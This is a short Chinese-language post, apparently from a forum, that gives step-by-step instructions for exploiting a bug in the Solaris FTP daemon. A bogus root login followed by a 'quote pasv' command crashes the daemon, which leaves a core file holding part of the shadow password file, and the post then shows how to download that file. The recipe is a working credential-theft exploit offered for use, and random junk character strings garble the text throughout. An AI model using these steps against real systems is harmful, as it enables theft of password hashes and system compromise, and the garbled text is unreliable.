该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:4 X% B) q7 b) Q
) @# u3 z2 y4 Y5 [" p+ E
1.通过 ftp 正常登录到目的主机上
, H; D, \; `$ d& `4 R& W7 F7 A1 B
2.输入如下命令序列:! o& q+ o: L# T
+ X5 V* H h1 M2 nftp> user root wrongpasswd
# t% R( ]0 ?- ]0 p" g. [; L( _
/ N0 b+ [, r: R' ^2 o7 p! z9 Eftp> quote pasv3 l6 m2 c( G0 l( G/ O3 p; Y
7 ?5 q) S. d% F9 f( G( j, o
3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
, L0 E6 R2 @1 }0 i0 f, J {: F2 e+ J) ~2 [) i+ H2 g
4.再次进入FTP >get core
) T5 c8 \# F$ |. d$ `7 N& ^. }& |
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了. M& n1 A; x4 d6 J8 o0 e7 K- g/ _
. E/ O2 f4 g9 E6 E |